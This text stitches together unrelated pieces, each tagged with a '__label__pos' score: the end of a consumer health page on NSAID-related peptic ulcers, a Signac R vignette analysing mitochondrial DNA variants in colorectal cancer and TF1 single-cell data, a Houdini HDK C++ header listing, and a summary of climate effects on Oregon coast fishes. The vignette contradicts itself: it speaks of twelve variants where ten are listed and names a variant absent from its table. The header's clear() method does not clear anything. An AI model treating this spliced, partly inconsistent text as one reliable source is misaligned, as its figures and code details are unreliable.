people who use NSAIDs, some are at higher risk of developing peptic ulcers than others. NSAID users who are infected with H.pylori have a greatly increased risk of developing a peptic ulcer and an increased risk of bleeding. NSAID-induced peptic ulcers are more common in: • older people (those aged 70 years and older); • those taking certain other medicines (such as corticosteroids or some medicines for osteoporosis) at the same time; • people who have had peptic ulcers in the past; • people who drink alcohol; and • those who smoke. How do NSAIDs cause peptic ulcers? Taking NSAIDs can make the stomach lining more vulnerable to the potentially damaging effects of stomach acid, especially in older people or people taking them for a long time. That’s because NSAIDs inhibit substances called prostaglandins that help protect the mucosal lining of the stomach. Rare causes of peptic ulcers Zollinger-Ellison syndrome is a rare cause of peptic ulcers. People with this condition have a tumour (or tumours), usually in their duodenum or pancreas, that releases a hormone called gastrin. This hormone causes the stomach to make more acid than usual, and the excess acid can cause peptic ulcers to develop. Peptic ulcers can also sometimes develop in people who are very unwell (usually those being treated in intensive care units in hospitals for problems such as severe burns). These so-called stress ulcers are actually caused by a lack of blood flow to the stomach. People who are seriously ill are usually given acid-suppressing medicines to try to prevent this type of peptic ulcer developing. Some infections and medicines other than NSAIDs can also rarely cause peptic ulcers. In other cases, no obvious cause can be found. References 1. Gastric disorders (published March 2016). In: eTG complete. Melbourne: Therapeutic Guidelines Limited; 2018 Jul. https://tgldcdp.tg.org.au/ (accessed Oct 2018). 2. BMJ Best Practice. Peptic ulcer disease (updated Jan 2018; reviewed Sep 2018). https://bestpractice.bmj.com/topics/en-gb/80 (accessed Oct 2018). 3. Drini M. Peptic ulcer disease and non-steroidal anti-inflammatory drugs. Aust Prescr 2017;40:91-3. DOI: 10.18773/austprescr.2017.037. https://www.nps.org.au/australian-prescriber/articles/peptic-ulcer-disease-and-non-steroidal-anti-inflammatory-drugs (accessed Oct 2018). 4. Mitchell H, Katerlaris P. Epidemiology, clinical impacts and current clinical management of Helicobacter pylori infection. Med J Aust 2016; 204 (10): 376-380. || doi: 10.5694/mja16.00104. https://www.mja.com.au/journal/2016/204/10/epidemiology-clinical-impacts-and-current-clinical-management-helicobacter (accessed Oct 2018). 5. Ng JCH, Yeomans ND. Helicobacter pylori infection and the risk of upper gastrointestinal bleeding in low dose aspirin users: systematic review and meta-analysis. Med J Aust 2018;209(7):306-11. doi: 10.5694/mja17.01274. https://www.mja.com.au/journal/2018/209/7/helicobacter-pylori-infection-and-risk-upper-gastrointestinal-bleeding-low-dose (accessed Oct 2018). YOU MAY ALSO LIKE Receive the latest news Subscribe To Our Weekly Newsletter Get notified about new articles
__label__pos
0.525351
Here, we take a look at two different datasets containing both DNA accessibility measurements and mitochondrial mutation data in the same cells. One was sampled from a patient with a colorectal cancer (CRC) tumor, and the other is from a polyclonal TF1 cell line. This data was produced by Lareau and Ludwig et al. (2020), and you can read the original paper here: https://doi.org/10.1038/s41587-020-0645-6. Processed data files, including mitochondrial variant data for the CRC and TF1 dataset is available on Zenodo here: https://zenodo.org/record/3977808 Raw sequencing data and DNA accessibility processed files for the these datasets are available on NCBI GEO here: https://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE142745 View data download code The required files can be downloaded by running the following lines in a shell: # ATAC data wget https://zenodo.org/record/3977808/files/CRC_v12-mtMask_mgatk.filtered_peak_bc_matrix.h5 wget https://zenodo.org/record/3977808/files/CRC_v12-mtMask_mgatk.singlecell.csv wget https://zenodo.org/record/3977808/files/CRC_v12-mtMask_mgatk.fragments.tsv.gz wget https://zenodo.org/record/3977808/files/CRC_v12-mtMask_mgatk.fragments.tsv.gz.tbi # mitochondrial allele data wget https://zenodo.org/record/3977808/files/CRC_v12-mtMask_mgatk.A.txt.gz wget https://zenodo.org/record/3977808/files/CRC_v12-mtMask_mgatk.C.txt.gz wget https://zenodo.org/record/3977808/files/CRC_v12-mtMask_mgatk.G.txt.gz wget https://zenodo.org/record/3977808/files/CRC_v12-mtMask_mgatk.T.txt.gz wget https://zenodo.org/record/3977808/files/CRC_v12-mtMask_mgatk.depthTable.txt wget https://zenodo.org/record/3977808/files/CRC_v12-mtMask_mgatk.chrM_refAllele.txt Colorectal cancer dataset To demonstrate combined analyses of mitochondrial DNA variants and accessible chromatin, we’ll walk through a vignette analyzing cells from a primary colorectal adenocarcinoma. The sample contains a mixture of malignant epithelial cells and tumor infiltrating immune cells. Loading the DNA accessibility data First we load the scATAC-seq data and create a Seurat object following the standard workflow for scATAC-seq data. # load counts and metadata from cellranger-atac counts <- Read10X_h5(filename = "../vignette_data/mito/CRC_v12-mtMask_mgatk.filtered_peak_bc_matrix.h5") metadata <- read.csv( file = "../vignette_data/mito/CRC_v12-mtMask_mgatk.singlecell.csv", header = TRUE, row.names = 1 ) # load gene annotations from Ensembl annotations <- GetGRangesFromEnsDb(ensdb = EnsDb.Hsapiens.v75) # change to UCSC style since the data was mapped to hg19 seqlevels(annotations) <- paste0('chr', seqlevels(annotations)) genome(annotations) <- "hg19" # create object crc_assay <- CreateChromatinAssay( counts = counts, sep = c(":", "-"), annotation = annotations, min.cells = 10, genome = "hg19", fragments = '../vignette_data/mito/CRC_v12-mtMask_mgatk.fragments.tsv.gz' ) crc <- CreateSeuratObject( counts = crc_assay, assay = 'peaks', meta.data = metadata ) crc[["peaks"]] ## ChromatinAssay data with 81787 features for 3535 cells ## Variable features: 0 ## Genome: hg19 ## Annotation present: TRUE ## Motifs present: FALSE ## Fragment files: 1 Quality control We can compute the standard quality control metrics for scATAC-seq and filter out low-quality cells based on these metrics. # Augment QC metrics that were computed by cellranger-atac crc$pct_reads_in_peaks <- crc$peak_region_fragments / crc$passed_filters * 100 crc$pct_reads_in_DNase <- crc$DNase_sensitive_region_fragments / crc$passed_filters * 100 crc$blacklist_ratio <- crc$blacklist_region_fragments / crc$peak_region_fragments # compute TSS enrichment score and nucleosome banding pattern crc <- TSSEnrichment(crc) crc <- NucleosomeSignal(crc) # visualize QC metrics for each cell VlnPlot(crc, c("TSS.enrichment", "nCount_peaks", "nucleosome_signal", "pct_reads_in_peaks", "pct_reads_in_DNase", "blacklist_ratio"), pt.size = 0, ncol = 3) # remove low-quality cells crc <- subset( x = crc, subset = nCount_peaks > 1000 & nCount_peaks < 50000 & pct_reads_in_DNase > 40 & blacklist_ratio < 0.05 & TSS.enrichment > 3 & nucleosome_signal < 4 ) crc ## An object of class Seurat ## 81787 features across 1861 samples within 1 assay ## Active assay: peaks (81787 features, 0 variable features) Loading the mitochondrial variant data Next we can load the mitochondrial DNA variant data for these cells that was quantified using mgatk. The ReadMGATK() function in Signac allows the output from mgatk to be read directly into R in a convenient format for downstream analysis with Signac. Here, we load the data and add it to the Seurat object as a new assay. # load mgatk output mito.data <- ReadMGATK(dir = "../vignette_data/mito/crc/") # create an assay mito <- CreateAssayObject(counts = mito.data$counts) # Subset to cell present in the scATAC-seq assat mito <- subset(mito, cells = colnames(crc)) # add assay and metadata to the seurat object crc[["mito"]] <- mito crc <- AddMetaData(crc, metadata = mito.data$depth, col.name = "mtDNA_depth") We can look at the mitochondrial sequencing depth for each cell, and further subset the cells based on mitochondrial sequencing depth. VlnPlot(crc, "mtDNA_depth", pt.size = 0.1) + scale_y_log10() # filter cells based on mitochondrial depth crc <- subset(crc, mtDNA_depth >= 10) crc ## An object of class Seurat ## 214339 features across 1359 samples within 2 assays ## Active assay: peaks (81787 features, 0 variable features) ## 1 other assay present: mito Dimension reduction and clustering Next we can run a standard dimension reduction and clustering workflow using the scATAC-seq data to identify cell clusters. crc <- RunTFIDF(crc) crc <- FindTopFeatures(crc, min.cutoff = 10) crc <- RunSVD(crc) crc <- RunUMAP(crc, reduction = "lsi", dims = 2:50) crc <- FindNeighbors(crc, reduction = "lsi", dims = 2:50) crc <- FindClusters(crc, resolution = 0.5, algorithm = 3) ## Modularity Optimizer version 1.3.0 by Ludo Waltman and Nees Jan van Eck ## ## Number of nodes: 1359 ## Number of edges: 60801 ## ## Running smart local moving algorithm... ## Maximum modularity in 10 random starts: 0.8085 ## Number of communities: 6 ## Elapsed time: 0 seconds DimPlot(crc, label = TRUE) + NoLegend() Generate gene scores To help interpret these clusters of cells, and assign a cell type label, we’ll estimate gene activities by summing the DNA accessibility in the gene body and promoter region. # compute gene accessibility gene.activities <- GeneActivity(crc) # add to the Seurat object as a new assay crc[['RNA']] <- CreateAssayObject(counts = gene.activities) crc <- NormalizeData( object = crc, assay = 'RNA', normalization.method = 'LogNormalize', scale.factor = median(crc$nCount_RNA) ) Visualize interesting gene activity scores We note the following markers for different cell types in the CRC dataset: • EPCAM is a marker for epithelial cells • TREM1 is a meyloid marker • PTPRC = CD45 is a pan-immune cell marker • IL1RL1 is a basophil marker • GATA3 is a Tcell maker DefaultAssay(crc) <- 'RNA' FeaturePlot( object = crc, features = c('TREM1', 'EPCAM', "PTPRC", "IL1RL1","GATA3", "KIT"), pt.size = 0.1, max.cutoff = 'q95', ncol = 2 ) Using these gene score values, we can assign cluster identities: crc <- RenameIdents( object = crc, '0' = 'Epithelial', '1' = 'Epithelial', '2' = 'Basophil', '3' = 'Myeloid_1', '4' = 'Myeloid_2', '5' = 'Tcell' ) One of the myeloid clusters has a lower percentage of fragments in peaks, as well as a lower overall mitochondrial sequencing depth and a different nucleosome banding pattern. p1 <- FeatureScatter(crc, "mtDNA_depth", "pct_reads_in_peaks") + ggtitle("") + scale_x_log10() p2 <- FeatureScatter(crc, "mtDNA_depth", "nucleosome_signal") + ggtitle("") + scale_x_log10() p1 + p2 + plot_layout(guides = 'collect') We can see that most of the low FRIP cells were the myeloid 1 cluster. This is most likely an intra-tumor granulocyte that has relatively poor accessible chromatin enrichment. Similarly, the unusual nuclear chromatin packaging of this cell type yields slightly reduced mtDNA coverage compared to the myeloid 2 cluster. Find informative mtDNA variants Next, we can identify sites in the mitochondrial genome that vary across cells, and cluster the cells into clonotypes based on the frequency of these variants in the cells. Signac utilizes the principles established in the original mtscATAC-seq work of identifying high-quality variants. variable.sites <- IdentifyVariants(crc, assay = "mito", refallele = mito.data$refallele) VariantPlot(variants = variable.sites) The plot above clearly shows a group of variants with a higher VMR and strand concordance. In principle, a high strand concordance reduces the likelihood of the allele frequency being driven by sequencing error (which predominately occurs on one but not the other strand. This is due to the preceding nucleotide content and a common error in mtDNA genotyping). On the other hand, variants that have a high VMR are more likely to be clonal variants as the alternate alleles tend to aggregate in certain cells rather than be equivalently dispersed about all cells, which would be indicative of some other artifact. We note that variants that have a very low VMR and and very high strand concordance are homoplasmic variants for this sample. While these may be interesting in some settings (e.g. donor demultiplexing), for inferring subclones, these are not particularly useful. Based on these thresholds, we can filter out a set of informative mitochondrial variants that differ across the cells. # Establish a filtered data frame of variants based on this processing high.conf <- subset( variable.sites, subset = n_cells_conf_detected >= 5 & strand_correlation >= 0.65 & vmr > 0.01 ) high.conf[,c(1,2,5)] ## position nucleotide mean ## 1227G>A 1227 G>A 0.0083723 ## 6081G>A 6081 G>A 0.0027487 ## 9804G>A 9804 G>A 0.0032730 ## 12889G>A 12889 G>A 0.0227327 ## 9728C>T 9728 C>T 0.0134110 ## 16147C>T 16147 C>T 0.6440270 ## 824T>C 824 T>C 0.0054583 ## 2285T>C 2285 T>C 0.0055419 ## 9840T>C 9840 T>C 0.0021322 ## 16093T>C 16093 T>C 0.0079506 A few things stand out. First, 10 out of the 12 variants occur at less than 1% allele frequency in the population. However, 16147C>T is present at about 62%. We’ll see that this is a clonal variant marking the epithelial cells. Additionally, all of the called variants are transitions (A - G or C - T) rather than transversion mutations (A - T or C - G). This fits what we know about how these mutations arise in the mitochondrial genome. Depending on your analytical question, these thresholds can be adjusted to identify variants that are more prevalent in other cells. Compute the variant allele frequency for each cell We currently have information for each strand stored in the mito assay to allow strand concordance to be assessed. Now that we have our set of high-confidence informative variants, we can create a new assay containing strand-collapsed allele frequency counts for each cell for these variants using the AlleleFreq() function. crc <- AlleleFreq( object = crc, variants = high.conf$variant, assay = "mito" ) crc[["alleles"]] ## Assay data with 10 features for 1359 cells ## First 10 features: ## 1227G>A, 6081G>A, 9804G>A, 12889G>A, 9728C>T, 16147C>T, 824T>C, ## 2285T>C, 9840T>C, 16093T>C Visualize the variants Now that the allele frequencies are stored as an additional assay, we can use the standard functions in Seurat to visualize how these allele frequencies are distributed across the cells. Here we visualize a subset of the variants using FeaturePlot() and DoHeatmap(). DefaultAssay(crc) <- "alleles" alleles.view <- c("12889G>A", "16147C>T", "9728C>T", "9804G>A") FeaturePlot( object = crc, features = alleles.view, order = TRUE, cols = c("grey", "darkred"), ncol = 4 ) & NoLegend() DoHeatmap(crc, features = rownames(crc), slot = "data", disp.max = 1) + scale_fill_viridis_c() Here, we can see a few interesting patterns for the selected variants. 16147C>T is present in essentially all epithelial cells and almost exclusively in epithelial cells (the edge cases where this isn’t true are also cases where the UMAP and clustering don’t full agree). It is at 100% allele frequency– strongly suggestive of whatever cell of origin of this tumor had the mutation at 100% and then expanded. We then see at least 3 variants 1227G>A, 12889G>A, and 9728C>T that are mostly present specifically in the epithelial cells that define subclones. Other variants including 3244G>A, 9804G>A, and 824T>C are found specifically in immune cell populations, suggesting that these arose from a common hematopoetic progenitor cell (probably in the bone marrow). TF1 cell line dataset Next we’ll demonstrate a similar workflow to identify cell clones in a different dataset, this time generated from a TF1 cell line. This dataset contains more clones present at a higher proportion, based on the experimental design. We’ll demonstrate how to identify groups of related cells (clones) by clustering the allele frequency data and how to relate these clonal groups to accessibility differences utilizing the multimodal capabilities of Signac. Data loading View data download code To download the data from Zenodo run the following in a shell: # ATAC data wget https://zenodo.org/record/3977808/files/TF1.filtered.fragments.tsv.gz wget https://zenodo.org/record/3977808/files/TF1.filtered.fragments.tsv.gz.tbi wget https://zenodo.org/record/3977808/files/TF1.filtered.narrowPeak.gz # mitochondrial genome data wget https://zenodo.org/record/3977808/files/TF1_filtered.A.txt.gz wget https://zenodo.org/record/3977808/files/TF1_filtered.T.txt.gz wget https://zenodo.org/record/3977808/files/TF1_filtered.C.txt.gz wget https://zenodo.org/record/3977808/files/TF1_filtered.G.txt.gz wget https://zenodo.org/record/3977808/files/TF1_filtered.chrM_refAllele.txt.gz wget https://zenodo.org/record/3977808/files/TF1_filtered.depthTable.txt.gz # read the mitochondrial data tf1.data <- ReadMGATK(dir = "../vignette_data/mito/tf1/") ## Reading allele counts ## Reading metadata ## Building matrices # create a Seurat object tf1 <- CreateSeuratObject( counts = tf1.data$counts, meta.data = tf1.data$depth, assay = "mito" ) # load the peak set peaks <- read.table( file = "../vignette_data/mito/TF1.filtered.narrowPeak.gz", sep = "\t", col.names = c("chrom", "start", "end", "peak", "width", "strand", "x", "y", "z", "w") ) peaks <- makeGRangesFromDataFrame(peaks) # create fragment object frags <- CreateFragmentObject( path = "../vignette_data/mito/TF1.filtered.fragments.tsv.gz", cells = colnames(tf1) ) ## Computing hash # quantify the DNA accessibility data counts <- FeatureMatrix( fragments = frags, features = peaks, cells = colnames(tf1) ) ## Extracting reads overlapping genomic regions # create assay with accessibility data and add it to the Seurat object tf1[["peaks"]] <- CreateChromatinAssay( counts = counts, fragments = frags ) Quality control # add annotations Annotation(tf1[["peaks"]]) <- annotations DefaultAssay(tf1) <- "peaks" tf1 <- NucleosomeSignal(tf1) tf1 <- TSSEnrichment(tf1) VlnPlot(tf1, c("nCount_peaks", "nucleosome_signal", "TSS.enrichment"), pt.size = 0.1) tf1 <- subset( x = tf1, subset = nCount_peaks > 500 & nucleosome_signal < 2 & TSS.enrichment > 2.5 ) tf1 ## An object of class Seurat ## 255300 features across 832 samples within 2 assays ## Active assay: peaks (122748 features, 0 variable features) ## 1 other assay present: mito Identifying variants DefaultAssay(tf1) <- "mito" variants <- IdentifyVariants(tf1, refallele = tf1.data$refallele) ## Computing total coverage per base ## Processing A ## Processing T ## Processing C ## Processing G VariantPlot(variants) high.conf <- subset( variants, subset = n_cells_conf_detected >= 5 & strand_correlation >= 0.65 & vmr > 0.01 ) tf1 <- AlleleFreq(tf1, variants = high.conf$variant, assay = "mito") tf1[["alleles"]] ## Assay data with 51 features for 832 cells ## First 10 features: ## 627G>A, 709G>A, 1045G>A, 1793G>A, 1888G>A, 1906G>A, 2002G>A, 2040G>A, ## 2573G>A, 2643G>A Identifying clones Now that we’ve identified a set of variable alleles, we can cluster the cells based on the frequency of each of these alleles using the FindClonotypes() function. This uses the Louvain community detection algorithm implemented in Seurat. DefaultAssay(tf1) <- "alleles" tf1 <- FindClonotypes(tf1) ## Modularity Optimizer version 1.3.0 by Ludo Waltman and Nees Jan van Eck ## ## Number of nodes: 832 ## Number of edges: 15680 ## ## Running smart local moving algorithm... ## Maximum modularity in 10 random starts: 0.8398 ## Number of communities: 12 ## Elapsed time: 0 seconds ## ## 10 11 9 4 7 8 2 3 1 5 0 6 ## 17 11 23 107 32 30 116 107 123 80 153 33 Here we see that the clonal clustering has identified 12 different clones in the TF1 dataset. We can further visualize the frequency of alleles in these clones using DoHeatmap(). The FindClonotypes() function also performs hierarchical clustering on both the clonotypes and the alleles, and sets the factor levels for the clonotypes based on the hierarchical clustering order, and the order of variable features based on the hierarchical feature clustering. This allows us to get a decent ordering of both features and clones automatically: DoHeatmap(tf1, features = VariableFeatures(tf1), slot = "data", disp.max = 0.1) + scale_fill_viridis_c() Find differentially accessible peaks between clones Next we can use the clonal information derived from the mitochondrial assay to find peaks that are differentially accessible between clones. DefaultAssay(tf1) <- "peaks" # find peaks specific to one clone markers.fast <- FoldChange(tf1, ident.1 = 2) markers.fast <- markers.fast[order(markers.fast$avg_log2FC, decreasing = TRUE), ] # sort by fold change head(markers.fast) ## avg_log2FC pct.1 pct.2 ## chr5-42811975-42812177 3.801568 0.164 0.014 ## chr3-4061278-4061591 3.725423 0.172 0.018 ## chr5-44130972-44131478 3.666023 0.267 0.038 ## chr5-43874930-43875314 3.447547 0.284 0.029 ## chr5-42591230-42591506 3.413157 0.172 0.014 ## chr6-114906484-114906735 3.271312 0.147 0.018 We can the DNA accessibility in these regions for each clone using the CoveragePlot() function. As you can see, the peaks identified are highly specific to one clone. CoveragePlot( object = tf1, region = rownames(markers.fast)[1], extend.upstream = 2000, extend.downstream = 2000 ) ## Warning: Removed 47 rows containing missing values (`geom_segment()`). ## Warning: Removed 1 rows containing missing values (`geom_segment()`). Session Info ## R version 4.2.2 (2022-10-31) ## Platform: x86_64-conda-linux-gnu (64-bit) ## Running under: Red Hat Enterprise Linux 8.6 (Ootpa) ## ## Matrix products: default ## BLAS/LAPACK: /home/users/astar/gis/stuartt/mambaforge/envs/renv/lib/libopenblasp-r0.3.21.so ## ## locale: ## [1] LC_CTYPE=en_US.UTF-8 LC_NUMERIC=C ## [3] LC_TIME=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 ## [5] LC_MONETARY=en_US.UTF-8 LC_MESSAGES=en_US.UTF-8 ## [7] LC_PAPER=en_US.UTF-8 LC_NAME=C ## [9] LC_ADDRESS=C LC_TELEPHONE=C ## [11] LC_MEASUREMENT=en_US.UTF-8 LC_IDENTIFICATION=C ## ## attached base packages: ## [1] stats4 stats graphics grDevices utils datasets methods ## [8] base ## ## other attached packages: ## [1] EnsDb.Hsapiens.v75_2.99.0 ensembldb_2.22.0 ## [3] AnnotationFilter_1.22.0 GenomicFeatures_1.50.4 ## [5] AnnotationDbi_1.60.2 Biobase_2.58.0 ## [7] GenomicRanges_1.50.2 GenomeInfoDb_1.34.9 ## [9] IRanges_2.32.0 S4Vectors_0.36.2 ## [11] BiocGenerics_0.44.0 patchwork_1.1.2 ## [13] ggplot2_3.4.2 SeuratObject_4.1.3 ## [15] Seurat_4.3.0 Signac_1.10.0 ## ## loaded via a namespace (and not attached): ## [1] utf8_1.2.3 spatstat.explore_3.1-0 ## [3] reticulate_1.28 tidyselect_1.2.0 ## [5] RSQLite_2.3.1 htmlwidgets_1.6.2 ## [7] grid_4.2.2 BiocParallel_1.32.6 ## [9] Rtsne_0.16 munsell_0.5.0 ## [11] codetools_0.2-19 ragg_1.2.4 ## [13] ica_1.0-3 future_1.32.0 ## [15] miniUI_0.1.1.1 withr_2.5.0 ## [17] spatstat.random_3.1-4 colorspace_2.1-0 ## [19] progressr_0.13.0 filelock_1.0.2 ## [21] highr_0.10 knitr_1.43 ## [23] rstudioapi_0.14 ROCR_1.0-11 ## [25] tensor_1.5 listenv_0.9.0 ## [27] labeling_0.4.2 MatrixGenerics_1.10.0 ## [29] GenomeInfoDbData_1.2.9 polyclip_1.10-4 ## [31] farver_2.1.1 bit64_4.0.5 ## [33] rprojroot_2.0.3 parallelly_1.35.0 ## [35] vctrs_0.6.2 generics_0.1.3 ## [37] xfun_0.39 biovizBase_1.46.0 ## [39] BiocFileCache_2.6.1 lsa_0.73.3 ## [41] R6_2.5.1 ggbeeswarm_0.7.1 ## [43] hdf5r_1.3.8 bitops_1.0-7 ## [45] spatstat.utils_3.0-2 cachem_1.0.8 ## [47] DelayedArray_0.24.0 promises_1.2.0.1 ## [49] BiocIO_1.8.0 scales_1.2.1 ## [51] nnet_7.3-18 beeswarm_0.4.0 ## [53] gtable_0.3.3 globals_0.16.2 ## [55] goftest_1.2-3 rlang_1.1.1 ## [57] systemfonts_1.0.4 RcppRoll_0.3.0 ## [59] splines_4.2.2 rtracklayer_1.58.0 ## [61] lazyeval_0.2.2 dichromat_2.0-0.1 ## [63] checkmate_2.2.0 spatstat.geom_3.1-0 ## [65] yaml_2.3.7 reshape2_1.4.4 ## [67] abind_1.4-5 backports_1.4.1 ## [69] httpuv_1.6.9 Hmisc_5.1-0 ## [71] tools_4.2.2 ellipsis_0.3.2 ## [73] jquerylib_0.1.4 RColorBrewer_1.1-3 ## [75] ggridges_0.5.4 Rcpp_1.0.10 ## [77] plyr_1.8.8 base64enc_0.1-3 ## [79] progress_1.2.2 zlibbioc_1.44.0 ## [81] purrr_1.0.1 RCurl_1.98-1.12 ## [83] prettyunits_1.1.1 rpart_4.1.19 ## [85] deldir_1.0-9 pbapply_1.7-0 ## [87] cowplot_1.1.1 zoo_1.8-11 ## [89] SummarizedExperiment_1.28.0 ggrepel_0.9.3 ## [91] cluster_2.1.4 fs_1.6.2 ## [93] magrittr_2.0.3 data.table_1.14.8 ## [95] scattermore_0.8 lmtest_0.9-40 ## [97] RANN_2.6.1 SnowballC_0.7.0 ## [99] ProtGenerics_1.30.0 fitdistrplus_1.1-8 ## [101] matrixStats_0.63.0 hms_1.1.3 ## [103] mime_0.12 evaluate_0.21 ## [105] xtable_1.8-4 XML_3.99-0.14 ## [107] gridExtra_2.3 compiler_4.2.2 ## [109] biomaRt_2.54.1 tibble_3.2.1 ## [111] KernSmooth_2.23-20 crayon_1.5.2 ## [113] htmltools_0.5.5 later_1.3.0 ## [115] Formula_1.2-5 tidyr_1.3.0 ## [117] DBI_1.1.3 dbplyr_2.3.2 ## [119] MASS_7.3-58.3 rappdirs_0.3.3 ## [121] Matrix_1.5-4 cli_3.6.1 ## [123] parallel_4.2.2 igraph_1.4.3 ## [125] pkgconfig_2.0.3 pkgdown_2.0.7 ## [127] GenomicAlignments_1.34.1 foreign_0.8-84 ## [129] sp_1.6-0 plotly_4.10.1 ## [131] spatstat.sparse_3.0-1 xml2_1.3.4 ## [133] vipor_0.4.5 bslib_0.4.2 ## [135] XVector_0.38.0 VariantAnnotation_1.44.1 ## [137] stringr_1.5.0 digest_0.6.31 ## [139] sctransform_0.3.5 RcppAnnoy_0.0.20 ## [141] spatstat.data_3.0-1 Biostrings_2.66.0 ## [143] rmarkdown_2.21 leiden_0.4.3 ## [145] fastmatch_1.1-3 htmlTable_2.4.1 ## [147] uwot_0.1.14 restfulr_0.0.15 ## [149] curl_5.0.0 shiny_1.7.4 ## [151] Rsamtools_2.14.0 rjson_0.2.21 ## [153] lifecycle_1.0.3 nlme_3.1-162 ## [155] jsonlite_1.8.4 BSgenome_1.66.3 ## [157] desc_1.4.2 viridisLite_0.4.2 ## [159] fansi_1.0.4 pillar_1.9.0 ## [161] lattice_0.21-8 ggrastr_1.0.1 ## [163] KEGGREST_1.38.0 fastmap_1.1.1 ## [165] httr_1.4.6 survival_3.5-5 ## [167] glue_1.6.2 png_0.1-8 ## [169] bit_4.0.5 stringi_1.7.12 ## [171] sass_0.4.6 blob_1.2.4 ## [173] textshaping_0.3.6 memoise_2.0.1 ## [175] dplyr_1.1.2 irlba_2.3.5.1 ## [177] future.apply_1.10.0
__label__pos
0.825125
HDK  All Classes Namespaces Files Functions Variables Typedefs Enumerations Enumerator Friends Macros Pages CH_MultiChannel.h Go to the documentation of this file. 1 /* 2  * PROPRIETARY INFORMATION. This software is proprietary to 3  * Side Effects Software Inc., and is not to be reproduced, 4  * transmitted, or disclosed in any way without written permission. 5  * 6  * NAME: CH_MultiChannel.h (UI library, C++) 7  * 8  * COMMENTS: Manages an array of arbitary channels to act as a single one. 9  * This is meant to be a lightweight collection of channels that 10  * may belong to an arbitrary list of CH_Collection's. Ownership 11  * of the pointers are NOT assumed. 12  * 13  */ 14  15 #ifndef __CH_MultiChannel_h__ 16 #define __CH_MultiChannel_h__ 17  18 #include "CH_API.h" 19 #include "CH_Types.h" 20 #include <UT/UT_ValArray.h> 21 #include <UT/UT_Array.h> 22 #include <UT/UT_String.h> 23 #include <SYS/SYS_Types.h> 24  25 class CH_Channel; 26 class CH_Manager; 27  29 { 30 public: 32  explicit CH_MultiChannel(const char *name); 33  virtual ~CH_MultiChannel(); 34  35  CH_MultiChannel(const CH_MultiChannel &copy); 36  CH_MultiChannel &operator=( 37  const CH_MultiChannel &copy); 38  39  const UT_String & getName() const 40  { return myName; } 41  void setName(const UT_String &name) 42  { myName.harden(name); } 43  void appendChannelNames(const char *separator); 44  45  void clear() 46  { myChannels.entries(); } 47  void append(CH_Channel *channel); 48  50  { return myChannels; } 51  52  int getNumChannels() const 53  { return myChannels.entries(); } 54  55  void removeChannel(int i) 56  { myChannels.removeIndex((unsigned)i); } 57  58  void addToList(CH_ChannelList &channels) const; 59  60  bool isEmpty() const 61  { return myChannels.entries() == 0; } 62  bool isAllEnabled() const; 63  bool hasKeys() const; 64  65  fpreal getStart() const; 66  fpreal getEnd() const; 67  fpreal getLength() const; 68  69  bool isAtHardKey(fpreal gtime) const; 70  bool isAtHardKeyframe(int frame) const; 71  fpreal findKey(fpreal gtime, int direction) const; 72  int findKeyframe(int frame, int direction) const; 73  74  void scroll(fpreal newStart, int update = 1); 75  76 private: 77  // do not use! 78  int operator==(const CH_MultiChannel &) const 79  { return 0; } 80  81 protected: 82  // only subclasses can modify the array! 84  { return myChannels; } 85  86 private: 87  UT_String myName; 88  CH_ChannelList myChannels; 89 }; 90  91 #endif // __CH_MultiChannel_h__ 92  IMF_EXPORT IMATH_NAMESPACE::V3f direction(const IMATH_NAMESPACE::Box2i &dataWindow, const IMATH_NAMESPACE::V2f &pixelPosition) const UT_String & getName() const png_uint_32 i Definition: png.h:2877 int getNumChannels() const bool operator==(const BaseDimensions< T > &a, const BaseDimensions< Y > &b) Definition: Dimensions.h:137 void setName(const UT_String &name) CH_ChannelList & getModifyChannelList() GLuint const GLchar * name Definition: glcorearb.h:785 void removeChannel(int i) double fpreal Definition: SYS_Types.h:263 #define CH_API Definition: CH_API.h:10 const CH_ChannelList & getChannelList() const bool isEmpty() const
__label__pos
0.920831
Effect of Climate Change on Local Marine, Estuarine, and Riverine Fishes Several climate-related changes have the potential to affect critical fish habitat as well as abundance and distribution of fish on the Oregon coast. • Microsoft Word - FINAL Fish Climate Change Summary 01272014.docx Changes to marine habitats may reduce biodiversity and alter the distribution of fishes. • Degradation and loss of estuarine habitats may jeopardize the reproductive success of local fish. • Alterations to stream hydrology may result in critical habitat loss for cold water species. salmon spawning habitat; Photo: Umpqua Watersheds Climate-related changes such as sea level rise (SLR), ocean acidification, and increasing ocean temperature are expected to affect marine and estuarine fish habitats. Other changes, such as altered precipitation patterns and increased frequency and severity of flood and drought, are expected to affect freshwater fish habitats. Fish that inhabit a variety of environments at different life stages, such as anadromous (migratory spawning) salmonids, are likely to be affected by all climate-related changes that affect both marine and estuarine habitats as well as freshwater habitats. Example of Bootstrap 3 Accordion Many fish species use estuarine and near-shore ocean habitats at various parts of their life stages. Pacific herring (Clupea pallasii), require eelgrass beds, rocky shorelines or other substrates on which to attach their eggs during breeding season (Monaco and Emmett 1990). Many foraging fish species vital to the marine food web, such as surf smelt (Hypomesus pretiosus) and sand lance (Ammodytes hexapterus), use estuaries as breeding areas (Glick et al. 2007). Estuaries are vital to anadromous species by providing rearing habitats, the availability and quality of which affects ocean survival (Miller and Simenstad 1997). The availability of high quality estuarine habitats may be threatened by SLR. Scientists have not yet determined whether sand flat and mudflat elevations relative to tidal levels will be able to keep pace with SLR. In other words, sedimentation rates may adjust with sea level rise so sand and mud flats remain about the same elevation relative to tidal levels as they are now, resulting in very little change in fish habitat availability. However, it is unlikely that coastal communities will allow intertidal habitats to migrate inland where high value real estate exists (Glick et al. 2007; Yamanaka et al. 2013). As SLR threatens rocky, intertidal habitats, the availability of hard substrate for egg deposition may decline. Species diversity and distribution may be affected by SLR in instances where salt water encroaches on brackish and freshwater habitats. Glick et al. 2007 note that since aquatic animals have specific salinity tolerances, SLR-driven salinity changes will be beneficial for some species and unfavorable for others. They also suggest SLR may still affect fishes less sensitive to these changes because their food sources may be affected by changing salinity regimes even if they are not. Sea Level Rise Our local NOAA tide station in Charleston has documented an average rate of sea level rise (SLR) of 0.84 mm (0.03 inches) per year averaged over the past 30 years (0.27 feet in 100 years). The rate of SLR is expected to accelerate over time. For example, the National Research Council (NRC), predicted SLR rates as high as +23 cm (9 inches) by 2030; +48 cm (19 inches) by 2050; and +143 cm (56 inches) by 2100 for the area to the north of California’s Cape Mendocino (the study’s closest site to the Coos estuary). Sources: NOAA Tides and Currents 2013, NRC 2012 Few studies have been conducted investigating the effect of OA on fish in temperate marine ecosystems (Ishimatsu et al. 2004). 